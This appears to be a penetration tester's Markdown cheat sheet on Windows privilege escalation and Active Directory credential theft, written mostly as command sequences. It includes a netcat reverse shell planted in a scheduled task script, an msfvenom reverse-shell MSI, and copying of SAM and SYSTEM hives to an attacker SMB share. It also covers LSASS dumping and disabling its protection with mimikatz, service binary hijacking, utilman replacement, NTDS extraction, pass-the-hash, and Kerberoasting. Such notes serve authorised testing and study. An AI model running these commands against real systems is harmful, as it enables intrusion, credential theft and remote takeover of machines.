489 lines
13 KiB
Markdown
489 lines
13 KiB
Markdown
# Windows Privilege Escalation
|
|
|
|
## Links
|
|
|
|
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
|
|
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
|
|
* [JAWS](https://github.com/411Hall/JAWS)
|
|
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
|
|
* [privescheck](https://github.com/itm4n/PrivescCheck)
|
|
* [windows exploit suggester](https://github.com/bitsadmin/wesng)
|
|
* [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)
|
|
|
|
## Account Types
|
|
|
|
* __Administrator__ local & domain
|
|
* __Standard__ local & domain
|
|
* __Guest__
|
|
* __System__, local system, final escalation
|
|
* __Local Service__, got anonymous connections over network.
|
|
* __Network Service__, default service account, authentication via network
|
|
|
|
## Enumeration
|
|
|
|
### Users & Groups
|
|
|
|
```sh
|
|
whoami /priv
|
|
net users
|
|
net users <username>
|
|
net localgroup
|
|
net localgroup <groupname>
|
|
query session
|
|
qwinsta
|
|
```
|
|
|
|
### Files
|
|
|
|
* [powershell](../../../../enumeration/windows/powershell.md)
|
|
|
|
### System
|
|
|
|
```sh
|
|
hostname
|
|
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
|
```
|
|
* Installed software, check for existing exploits
|
|
```sh
|
|
wmic product get name,version,vendor
|
|
```
|
|
* Services
|
|
```sh
|
|
wmic service list brief | findstr "Running"
|
|
```
|
|
|
|
### Logfiles and Registry
|
|
|
|
```sh
|
|
cmdkey /list
|
|
```
|
|
* Keys containing passwords
|
|
```
|
|
reg query HKLM /f password /t REG_SZ /s
|
|
reg query HKCU /f password /t REG_SZ /s
|
|
```
|
|
|
|
### AD Credentials
|
|
|
|
* Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain)
|
|
```sh
|
|
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
|
|
```
|
|
|
|
#### NTDS
|
|
|
|
* Check user description of AD users
|
|
* NTDS consists of three tables
|
|
* Schema
|
|
* Link
|
|
* Data type
|
|
* Located under `C:\Windows\NTDS`
|
|
* File is locked by AD at runtime
|
|
* A System Bootkey is need to dump the NTDS
|
|
|
|
## Exploit
|
|
|
|
* __Use found credentials__
|
|
```sh
|
|
runas /savecred /user:<domain\user> reverse_shell.exe
|
|
```
|
|
|
|
### DLL Hijacking
|
|
|
|
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)
|
|
|
|
### Unquoted Service Path
|
|
|
|
* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)
|
|
|
|
### Token Impersonation
|
|
|
|
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
|
|
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
|
|
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
|
|
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
|
|
|
|
### Schedules Tasks
|
|
|
|
* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
|
|
* `Autoruns64.exe`
|
|
|
|
### MSI Elevated Installer
|
|
|
|
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
|
|
|
|
|
|
### accesschk64 Permissions
|
|
|
|
* Check access to files and folders
|
|
```sh
|
|
accesschk64 -wvu "file.exe"
|
|
```
|
|
* If permission `SERVICE_CHANGE_CONFIG` is set
|
|
```sh
|
|
sc config <service> binpath="net localgroup administrators user /add"
|
|
```
|
|
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
|
|
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
|
|
|
|
#### accesschk64 for Services
|
|
|
|
```sh
|
|
accesschk64 -qlc "service.exe"
|
|
```
|
|
* If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell
|
|
```sh
|
|
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
|
|
```
|
|
* Reconfigure and restart service
|
|
```sh
|
|
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
|
|
sc stop TheService
|
|
sc start TheService
|
|
```
|
|
|
|
### Startup Application
|
|
|
|
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
|
|
|
|
### Password Mining
|
|
|
|
* Set up metasploit
|
|
```sh
|
|
use auxiliary/server/capture/http_basic
|
|
set srvport 7777
|
|
set uripath pass
|
|
```
|
|
* Visit site on target
|
|
|
|
### Unattended Windows Installation
|
|
|
|
* Investigate the following paths to potentially find user credentials
|
|
```sh
|
|
C:\Unattend.xml
|
|
C:\Windows\Panther\Unattend.xml
|
|
C:\Windows\Panther\Unattend\Unattend.xml
|
|
C:\Windows\system32\sysprep.inf
|
|
C:\Windows\system32\sysprep\sysprep.xml
|
|
```
|
|
* Watch out for the `<Credentials>` tags
|
|
|
|
### Powershell History file
|
|
|
|
```sh
|
|
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
|
```
|
|
|
|
### Internet Information Services (IIS)
|
|
|
|
* Default web server on windows
|
|
* Paths containing credentials are the following
|
|
```sh
|
|
C:\inetpub\wwwroot\web.config
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
|
```
|
|
|
|
### Putty
|
|
|
|
* Saved proxy password credentials may be found via
|
|
```sh
|
|
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
|
|
```
|
|
|
|
### schtask and icacls
|
|
|
|
* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
|
|
* Check script for scheduled tasks, `F` means full access
|
|
```sh
|
|
icacls <PathToScript>
|
|
```
|
|
* Put payload inside the script
|
|
```sh
|
|
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
|
|
```
|
|
* Run the task
|
|
```sh
|
|
schtasks /run /tn <taskname>
|
|
```
|
|
|
|
### Always Installs Elevated
|
|
|
|
* These should be set
|
|
```sh
|
|
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
|
|
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
|
|
```
|
|
|
|
* Craft `*.msi` file with a payload
|
|
```sh
|
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
|
|
```
|
|
|
|
* Upload and execute via
|
|
```sh
|
|
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
|
|
```
|
|
|
|
### Service Misconfiguration
|
|
|
|
* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`
|
|
```sh
|
|
sc qc apphostsvc
|
|
```
|
|
* Check found permissions via
|
|
```sh
|
|
icacls <BINARY_PATH_NAME>
|
|
```
|
|
* If the service binary path is writeable move the payload to its path and grant permissions
|
|
```sh
|
|
icacls <Payload_Service.exe> /grant Everyone:F
|
|
```
|
|
```sh
|
|
sc stop <service>
|
|
sc start <service>
|
|
```
|
|
* Catch the reverse shell service
|
|
|
|
Others ways are:
|
|
* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
|
|
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`
|
|
|
|
### Unquoted Service Path
|
|
|
|
* If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
|
|
* A created directory at install time inherits the permissions from its parent. Check it via
|
|
```sh
|
|
icacls <directory>
|
|
```
|
|
* Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
|
|
* Set permissions
|
|
```sh
|
|
icacls C:\Path/to/service.exe /grant Everyone:F
|
|
```
|
|
|
|
### Permissions
|
|
|
|
* [priv2admin](https://github.com/gtworek/Priv2Admin)
|
|
* `whoami /priv`
|
|
|
|
#### SeBackup / Restore
|
|
|
|
* If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
|
|
* Download `SAM` and `System` hashes
|
|
```sh
|
|
reg save hklm\system C:\Windows\Temp\system.hive
|
|
reg save hklm\sam C:\Windows\Temp\sam.hive
|
|
```
|
|
* or
|
|
```sh
|
|
copy C:\Windows\System32\config\sam \\ATTACKER_IP\
|
|
```
|
|
* Start smb server on attack machine
|
|
```sh
|
|
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
|
|
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
|
|
```
|
|
|
|
* Dump the hashes
|
|
```sh
|
|
secretsdump.py -sam sam.hive -system system.hive LOCAL
|
|
```
|
|
* or meterpreter on target
|
|
```sh
|
|
hashdump
|
|
```
|
|
|
|
* Use pass the hash to login
|
|
```sh
|
|
psexec.py -hashes <hash> administrator@$TARGET_IP
|
|
```
|
|
|
|
#### SeTakeOwnership
|
|
|
|
* If `SeTakeOwnership` is set one can take ownership of every file or service.
|
|
```sh
|
|
takeown /f C:\Windows\System32\Utilman.exe
|
|
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
|
|
copy cmd.exe utilman.exe
|
|
```
|
|
* Log out, on the Login screen click on `Ease of Access`
|
|
|
|
#### SeImpersonate / SeAssignPrimaryToken
|
|
|
|
* It is a rouge potato
|
|
* Execute process as another user
|
|
* Service accounts operate through impersonation
|
|
* Check privileges via `whoami /priv` for these
|
|
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
|
|
```sh
|
|
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
|
```
|
|
* Catch the potatoe executable from target via netcat
|
|
|
|
|
|
### Volume Shadow Copy Service
|
|
|
|
* Take a look at the volumes at
|
|
```sh
|
|
vssadmin list shadows
|
|
```
|
|
|
|
* Copy `sam` and `system` from the shadow copy
|
|
```sh
|
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
|
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
|
```
|
|
|
|
### Dump LSASS
|
|
|
|
* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
|
|
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
|
|
|
|
* Extract the dump via mimikatz
|
|
```sh
|
|
privilege::debug
|
|
sekurlsa::logonpasswords
|
|
```
|
|
|
|
### LSASS Protection
|
|
|
|
__The bypass is needed most of the time in order to dump passwords__
|
|
* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `0` under
|
|
```sh
|
|
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
|
|
```
|
|
|
|
* Alternatively, use mimikatz
|
|
```sh
|
|
privilege::debug
|
|
!+
|
|
!processprotect /process:lsass.exe /remove
|
|
```
|
|
* `+!` calls `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory the this file lies__
|
|
|
|
### Windows Credential Manager
|
|
|
|
* Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager`
|
|
* Alternatively, command line can be used
|
|
```sh
|
|
vaultcmd /list
|
|
vaultcmd /listproperties:"Web Credentials"
|
|
vaultcmd /listcreds:"web credentials"
|
|
```
|
|
|
|
* Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1)
|
|
```sh
|
|
powershell -ex bypass
|
|
Get-WebCredentials
|
|
```
|
|
|
|
* Via mimikatz if administrative permissions have been gained
|
|
```sh
|
|
privilege::debug
|
|
sekurlsa::credman
|
|
```
|
|
|
|
### Ntdsutil
|
|
|
|
* If administrative permissions on the DC have been gained this can be done
|
|
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
|
|
|
|
|
|
#### Locally extracting ntds.dit
|
|
|
|
* This can be done to gather the system boot key
|
|
* No AD credentials are needed
|
|
* Three files are needed
|
|
* C:\Windows\NTDS\ntds.dit
|
|
* C:\Windows\System32\config\SYSTEM
|
|
* C:\Windows\System32\config\SECURITY
|
|
|
|
* Locally dumping all three needed file is done via
|
|
```sh
|
|
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q"
|
|
```
|
|
|
|
* Use `secretsdump` to extract `ntds.dit`
|
|
```sh
|
|
secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
|
|
```
|
|
|
|
#### Remotely dumping ntds
|
|
|
|
* Needs the following AD credentials
|
|
* Replicating Directory Changes
|
|
* Replicating Directory Changes All
|
|
* Replicating Directory Changes in Filtered Set
|
|
|
|
* Mimikatz or impacket can be used to gain credentials
|
|
* Impacket's secretsdump.py via
|
|
```sh
|
|
secretsdump.py -just-dc <domain>/<AD_Admin_User>@$DC_IP
|
|
secretsdump.py -just-dc-ntlm <domain>/<AD_Admin_User>@$DC_IP
|
|
```
|
|
|
|
### Local Administration Password Solution (LAPS)
|
|
|
|
* This is possible if the user which credentials we posses is member of the group to make password changes
|
|
* Replaces GPP, see below
|
|
|
|
* There are two interesting attributes
|
|
* __ms-mcs-AdmPwd__ contains plain text password of the local Administrator
|
|
* __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password
|
|
* __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__
|
|
* If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE`
|
|
|
|
* List the cmdlets for LAPS
|
|
```sh
|
|
Get-Command *AdmPwd*
|
|
```
|
|
* Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output
|
|
```sh
|
|
Find-AdmPwdExtendedRights -Identity <OU>
|
|
```
|
|
* Enumerate which hosts have LAPS enabled
|
|
* Impersonate the user and execute the following which displays the password
|
|
```sh
|
|
Get-AdmPwdPassword -ComputerName <targethost>
|
|
```
|
|
|
|
* Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users
|
|
```sh
|
|
net groups <ExtendedRightsHolder>
|
|
net user <GroupMemberUsername>
|
|
```
|
|
|
|
#### Group Policy Preferences
|
|
|
|
* Provisions administrational groups through the domain via SYSVOL
|
|
* Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN)
|
|
* Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it
|
|
|
|
|
|
### Kerberoasting
|
|
|
|
* Inital (low level) credentials are needed
|
|
* __Service Principal Name (SPN)__ account must be known, e.g. from web IIS user or SQL users
|
|
```sh
|
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
|
|
```
|
|
|
|
* Take a look at `Name` in the output and use it to query a TGS ticket
|
|
```sh
|
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
|
|
```
|
|
|
|
* Crack the kerberos hash
|
|
```sh
|
|
hashcat -m 13100 -a0 hash.txt --wordlist <wordlist>
|
|
```
|
|
|
|
### AS-REP Roasting
|
|
|
|
* `Do not require Kerberos pre-authentication` must be set on the AD user's account login settings. A password is used instead
|
|
* A list of potential users with this configured setting should be gathered
|
|
|
|
```sh
|
|
GetNPUsers.py -dc-ip $DC_IP <domain>/ -usersfile users.txt
|
|
```
|